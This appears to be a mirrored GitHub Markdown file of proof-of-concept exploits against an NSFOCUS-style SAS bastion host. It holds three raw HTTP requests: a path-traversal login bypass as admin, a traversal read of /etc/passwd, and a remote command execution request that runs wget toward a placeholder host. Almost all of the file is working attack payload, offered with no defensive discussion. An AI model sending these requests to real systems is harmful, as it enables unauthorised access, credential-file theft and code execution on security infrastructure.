mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-30 10:10:32 +00:00
30 lines
1.2 KiB
Markdown
30 lines
1.2 KiB
Markdown
|
## 某盟 SAS堡垒机 local_user.php 任意用户登录漏洞
|
||
|
|
```
|
||
|
|
|
||
|
|
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
|
||
|
|
Host: 1.1.1.1
|
||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Connection: close
|
||
|
|
```
|
||
|
|
|
||
|
|
## 某盟 SAS堡垒机 GetFile 任意文件读取漏洞
|
||
|
|
```
|
||
|
|
GET /webconf/GetFile/indexpath=../../../../../../../../../../../../../../etc/passwd HTTP/1.1
|
||
|
|
Host: 1.1.1.1
|
||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Connection: close
|
||
|
|
```
|
||
|
|
|
||
|
|
## 某盟 SAS堡垒机 Exec 远程命令执行漏洞
|
||
|
|
```
|
||
|
|
GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
|
||
|
|
Host: 1.1.1.1
|
||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Connection: close
|
||
|
|
```
|